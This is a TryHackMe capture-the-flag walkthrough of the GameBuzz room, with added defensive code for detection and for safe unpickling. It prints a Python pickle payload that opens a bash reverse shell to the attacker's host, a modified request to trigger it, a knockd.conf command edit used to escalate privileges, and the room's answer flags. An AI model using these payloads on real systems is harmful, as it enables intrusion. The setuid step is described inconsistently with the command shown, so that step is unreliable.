
[GameBuzz] - A TryHackMe Walkthrough


A Guide to the TryHackMe CTF room GameBuzz

[GameBuzz] is a CTF room by TryHackMe. Its difficulty is listed as Hard, and it is part of the Incognito 2.0 series featured on the platform. These rooms are fairly fun and created by the same author with similar themes. Let's get started.

Enumerate:

Nmap scan report for 10.10.129.236
Host is up, received reset ttl 61 (0.098s latency).
Scanned at 2022-05-18 14:55:44 EDT for 23s
Not shown: 998 closed tcp ports (reset)
PORT   STATE    SERVICE REASON              VERSION
22/tcp filtered ssh     port-unreach ttl 61
80/tcp open     http    syn-ack ttl 61      Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET OPTIONS HEAD
|_http-title: Incognito
|_http-server-header: Apache/2.4.29 (Ubuntu)
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Adtran 424RG FTTH gateway (92%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).

Okay, so we see the basic services and begin a more thorough scan. Now, let's go ahead and add the IP to our local hosts file as incognito.com, so we can check for potential vhosts and subdomains. This domain name is listed in the contacts area at the bottom of the front page on the website, but we assumed it based on previous experience with this series.


While the thorough scan is running, we'll go ahead and try to enumerate further with a subdomain brute force. I chose the ffuf tool for this, which is not limited to brute forcing subdomains. I use ffuf to fuzz the Host header, repeatedly issuing GET requests to the main page and ignoring responses whose size (word count, via -fw) matches the default index page, like so:

ffuf -w /home/mootiny/resources/SecLists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt -H "Host: FUZZ.incognito.com" -u http://incognito.com -fw 8853
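Seen from the server side, this Host-header fuzzing leaves a distinctive trace: one client requests the same path with many different, mostly nonexistent Host values in a few seconds. The following Python script is an added example, not part of the original walkthrough. It assumes a custom Apache LogFormat that records %{Host}i (the default "combined" format does not), parses constructed sample lines, and flags any client that presents more than a threshold of Host names the server does not actually serve. The KNOWN_HOSTS set and the log lines are constructed for the demo.

```python
import re
from collections import defaultdict

# Assumed Apache format (not the room's config). Default "combined" logs omit
# the Host header, so use vhost_combined or a custom format such as:
#   LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Host}i\" \"%{User-Agent}i\"" vhost_audit
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<host>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Names this server legitimately answers for (assumed for the demo).
KNOWN_HOSTS = {"incognito.com", "dev.incognito.com"}

# Constructed sample: one normal visitor (10.0.0.5), one client cycling through
# a wordlist in the Host header (10.0.0.9), one typo (10.0.0.7), one junk line.
SAMPLE_LOG = """\
10.0.0.5 - - [18/May/2022:14:57:01 -0400] "GET / HTTP/1.1" 200 8853 "incognito.com" "Mozilla/5.0"
10.0.0.9 - - [18/May/2022:14:57:02 -0400] "GET / HTTP/1.1" 200 8853 "www.incognito.com" "Fuzz Faster U Fool v1.5.0"
10.0.0.9 - - [18/May/2022:14:57:02 -0400] "GET / HTTP/1.1" 200 8853 "mail.incognito.com" "Fuzz Faster U Fool v1.5.0"
10.0.0.9 - - [18/May/2022:14:57:02 -0400] "GET / HTTP/1.1" 200 8853 "ftp.incognito.com" "Fuzz Faster U Fool v1.5.0"
10.0.0.9 - - [18/May/2022:14:57:03 -0400] "GET / HTTP/1.1" 200 8853 "admin.incognito.com" "Fuzz Faster U Fool v1.5.0"
10.0.0.9 - - [18/May/2022:14:57:03 -0400] "GET / HTTP/1.1" 200 1337 "dev.incognito.com" "Fuzz Faster U Fool v1.5.0"
10.0.0.7 - - [18/May/2022:14:58:10 -0400] "GET / HTTP/1.1" 200 8853 "incognito.com." "curl/7.81.0"
this line is not in the expected format and is skipped
"""


def parse_line(line):
    """Return the log fields as a dict, or None for lines that don't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def unknown_hosts_by_client(lines, known=KNOWN_HOSTS):
    """Map client IP -> set of Host values that are not names we serve."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host = rec["host"].lower().split(":")[0]  # drop an explicit port
        if host not in known:
            seen[rec["ip"]].add(host)
    return seen


def find_vhost_fuzzers(lines, threshold=3, known=KNOWN_HOSTS):
    """Clients that presented at least `threshold` distinct unknown Host values."""
    return {
        ip: sorted(hosts)
        for ip, hosts in unknown_hosts_by_client(lines, known).items()
        if len(hosts) >= threshold
    }


if __name__ == "__main__":
    for ip, hosts in find_vhost_fuzzers(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(hosts)} unknown vhosts tried, e.g. {hosts[:3]}")
```

The User-Agent string is deliberately not used as the signal: ffuf's default one is trivially changed, while the variety of unknown Host names is inherent to the technique. A production version would bucket by time window rather than over the whole file.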

Our ffuf fuzz found the subdomain 'dev', so we'll add that to our hosts file as well.


The home page at http://dev.incognito.com says 'Only for Developers' and nothing else. No references in the source or anything. Oddly, this is a good sign for us; perhaps there's an API or something lurking around here, definitely more than just this. So, we continue to enumerate with the ffuf tool, looking for subdirectories this time (if it doesn't find any, we'd go hunting for files, but typically people like a dashboard or something useful if they have a WWW front end).

ffuf -w /home/mootiny/resources/SecLists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt -u http://dev.incognito.com/FUZZ

And our intuition/assumption doesn't fail us, as we find the subdirectory 'secret' and its subdirectory 'upload' (clearly this is an exciting endpoint for us as an attacker: development environment, hidden upload directory, there should be some "loot" here, if not an entry point where we can get a foothold).


Analysis:

There's one more clue we found from our thorough scan. If you click on the subscribe email link, your browser sends an HTTP POST request with a JSON body referencing a file named object.pkl (which is Python Pickle format).

--- request ---

POST http://incognito.com/fetch HTTP/1.1
Host: incognito.com
Connection: keep-alive
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Content-Type: application/json
Origin: http://incognito.com
Referer: http://incognito.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{"object":"/var/upload/games/object.pkl"}

--- response ---

HTTP/1.1 200 OK
Date: Wed, 18 May 2022 20:22:30 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

{"Game": "GTA5", "Rating": 9, "Review": "Nice"}

The actual response is binary, but it's just a JSON-like object in Python Pickle format that breaks down to the content I decoded for you above. We're going to try a Python Pickle deserialization attack here and see if we can get RCE (our RCE payload will be a reverse shell, because of course it will). So, we'll go ahead and start a listener too.
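Two separate defects make the /fetch endpoint exploitable: it accepts an arbitrary filesystem path in the "object" field, and it unpickles whatever that file contains, which lets a __reduce__ method name any callable. The following Python module is an added example, not code from the room or from the walkthrough, showing how the handler should have been written: the client-supplied path is confined to an assumed upload directory, and the pickle is loaded through an Unpickler whose find_class refuses every global, so plain data (the game-review dict) still loads while a payload of the shape used later in this walkthrough is stopped before its callable is resolved. The directory, the sample pickles and the harmless os.getcwd stand-in are constructed for the demo.

```python
import io
import os
import pickle
from pathlib import Path

# Directory the endpoint is meant to read from (assumed from the request above).
ALLOWED_DIR = "/var/upload/games"


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import anything.

    Plain data (dict, list, str, int, ...) pickles without referencing a
    module, so loading the review object never reaches find_class. A payload
    whose __reduce__ names os.system (or any other callable) must resolve that
    global first, and that is exactly where it is stopped.
    """

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to load global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True if the restricted loader refuses this pickle."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


def resolve_object_path(requested: str, base=ALLOWED_DIR):
    """Confine the client-supplied 'object' value to base; None if it escapes.

    pathlib replaces base entirely when `requested` is absolute, so the check
    has to happen after joining and resolving, not on the input string.
    """
    base_path = Path(base).resolve()
    candidate = (base_path / requested).resolve()
    if base_path not in candidate.parents or candidate.suffix != ".pkl":
        return None
    return candidate


def load_review(requested: str, base=ALLOWED_DIR):
    """What the /fetch handler should do: confine the path, then load without globals."""
    path = resolve_object_path(requested, base)
    if path is None:
        raise ValueError("object path outside the upload directory")
    with open(path, "rb") as f:
        return safe_loads(f.read())


# --- constructed demo data ---
GOOD_PICKLE = pickle.dumps({"Game": "GTA5", "Rating": 9, "Review": "Nice"})


class _ReduceToCallable:
    """Same shape as a __reduce__ payload, but pointing at harmless os.getcwd."""

    def __reduce__(self):
        return (os.getcwd, ())


EVIL_PICKLE = pickle.dumps(_ReduceToCallable())

if __name__ == "__main__":
    print("review:", safe_loads(GOOD_PICKLE))
    print("callable payload rejected:", is_rejected(EVIL_PICKLE))
    print("object.pkl ->", resolve_object_path("object.pkl"))
    print("/var/upload/rev_shell ->", resolve_object_path("/var/upload/rev_shell"))
```

The stronger fix is to not use pickle for data that crosses a trust boundary at all; a JSON file with the same three fields carries the review just as well and has no code-execution path.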

Create malicious pickle binary using python:

#!/usr/bin/env python3
import os
import pickle

# __reduce__ tells pickle how to rebuild the object on load; the "constructor"
# here is os.system, so the unpickling side runs the shell command.
class pickleSerialization(object):
    def __reduce__(self):
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/<your IP>/5656 0>&1'",))

with open("rev_shell", "wb") as f:
    pickle.dump(pickleSerialization(), f)

Start our listener:

rlwrap ncat -lvnp 5656

Exploit:

Craft our request (this tool is called Fiddler, by the way.. it's pretty cool and lightweight. I prefer it over Burp and ZAP for some quick things.. obviously they have crazy useful plugins that aren't yet available for Fiddler):


Note the parameters, likely some of them are required to get the request to fire. So, the easiest way to do this is to click the button again on the main page and have your proxy STOP the request and simply change the body content of the request to reference our own file and then send it on forward.

POST http://incognito.com/fetch HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36
Host: incognito.com
Content-Length: 40
Content-Type: application/json
Connection: keep-alive
Accept: */*
X-Requested-With: XMLHttpRequest
Origin: http://incognito.com
Referer: http://incognito.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{
    "object":"/var/upload/rev_shell"
}


Escalate Privileges (or pivot, if needed):

Local Enumeration:

Now we're on to enumerating the host. Since we found two users, dev1 and dev2, one with read and execute access for world and one without, we're pretty sure we'll need to pivot from www-data over to dev2 before escalating to root. That's just the way these always work. However, if you know of a working kernel exploit, you can likely go ahead and pop root. (And good for you.)

Use whichever Linux enumeration tool you like. But, first and foremost, I always like to poke manually. So, since we saw SSH filtered before, let's look for a knockd.conf:

cat /etc/knockd.conf
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 5020,6120,7340
    seq_timeout = 15
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 15
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j REJECT
    tcpflags    = syn

Wonderful.. now we can open the port if we ever get a chance to stabilize our shell. I also noticed some mail for the dev1 user and tried my luck to see if we could read it and luckily we could. It gave us his password, so we do get to stabilize our shell and even copy our SSH key over for ease in the future.. super easy.

www-data@incognito:/tmp$ cat /var/mail/dev1
cat /var/mail/dev1
Hey, your password has been changed, dc647eb65e6711e155375218212b3964.
Knock yourself in!

This is great because, now that we have a password, we get to check sudo permissions even where NOPASSWD: isn't set, and if there's anything in there, it's pretty much good game, these days. Also, we get to provide linpeas.sh with our sudo password and see what it comes up with. As well, there's a tool called traitor that I like to use for privesc that can do amazing things with a small amount of sudo access.

Local Analysis

What do you know? linpeas.sh found a gaping oversight in our favour. Our old friend knockd.conf is writable, and knockd has to run privileged since it changes firewall rules, so there's our in. As well, we can restart knockd with sudo privileges. So, this is obviously the intended path. (We didn't need your Linux kernel 0day anyway, so there..)
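The root cause here is a configuration file that a privileged daemon executes commands from, yet is writable by an unprivileged user. The Python script below is an added example, not part of the walkthrough or of knockd itself, for the defending side: it parses knockd's INI-style config, reports every section whose command is not the iptables rule knockd exists to run, and checks the file's owner and mode for exactly the oversight linpeas found. The SAMPLE_CONF is constructed from the knockd.conf shown above, with the [closeSSH] command altered to the one this walkthrough uses later so the command check has something to flag.

```python
import stat
from pathlib import Path

# Constructed from the page's knockd.conf; [closeSSH] is altered for the demo.
SAMPLE_CONF = """\
[options]
    logfile = /var/log/knockd.log

[openSSH]
    sequence    = 5020,6120,7340
    seq_timeout = 15
    command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
    tcpflags    = syn

[closeSSH]
    sequence    = 9000,8000,7000
    seq_timeout = 15
    command     = /bin/bash -c "cp /bin/bash /tmp/f; chmod +x /tmp/f"
    tcpflags    = syn
"""

# The only thing a port-knock config should ever run (assumed policy).
EXPECTED_PREFIX = "/sbin/iptables "


def parse_knockd(text):
    """Minimal parser for knockd's INI-like format: {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def command_findings(sections, expected_prefix=EXPECTED_PREFIX):
    """Names of knock sections whose command is not the expected iptables rule."""
    return [
        name
        for name, opts in sections.items()
        if name != "options" and not opts.get("command", "").startswith(expected_prefix)
    ]


def mode_findings(st_mode, st_uid, st_gid):
    """Why a config that root executes from must not look like this."""
    findings = []
    if st_uid != 0:
        findings.append(f"owned by uid {st_uid}, not root")
    if st_gid != 0 and st_mode & stat.S_IWGRP:
        findings.append("group-writable by a non-root group")
    if st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_knockd(path="/etc/knockd.conf"):
    """Combine ownership/mode and command checks for a real file."""
    p = Path(path)
    st = p.stat()
    findings = mode_findings(st.st_mode, st.st_uid, st.st_gid)
    for name in command_findings(parse_knockd(p.read_text())):
        findings.append(f"section [{name}] runs an unexpected command")
    return findings


if __name__ == "__main__":
    print("unexpected commands:", command_findings(parse_knockd(SAMPLE_CONF)))
    print("mode 0666 root:root ->", mode_findings(0o100666, 0, 0))
    try:
        print("/etc/knockd.conf ->", audit_knockd())
    except OSError as exc:
        print("no local knockd.conf to audit:", exc)
```

The same two checks generalise to any file a root process reads commands from (cron tabs, sudoers drop-ins, systemd units): it should be root-owned, mode 0644 or tighter, and its contents should match a known-good baseline.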

Exploit Again (gain root/pwn):

Edit the config for /etc/knockd.conf to change the command from iptables to escalate your privileges (I chose to set uid on /bin/bash and copy it somewhere for any user)

/bin/bash -c "cp /bin/bash /tmp/f; chmod +x /tmp/f"

Restart the knockd service, so it will read the altered configuration:

sudo /etc/init.d/knockd restart

Knock one more time and use our setuid copy of bash to become root:


That'll be it for today. Have a good one you guys. Happy hacking!

Task 1  Challenge

Part of Incognito 2.0 CTF

Note- The machine may take about 5 minutes to fully boot.

Like my work, Follow on Twitter to be updated and know more about my work! (@0cirius0)

Answer the questions below

user.txt

d14def35ed0bd914c1c5881fa0fa8090

root.txt

9dcb607e31348671de36b9eb7446cb59
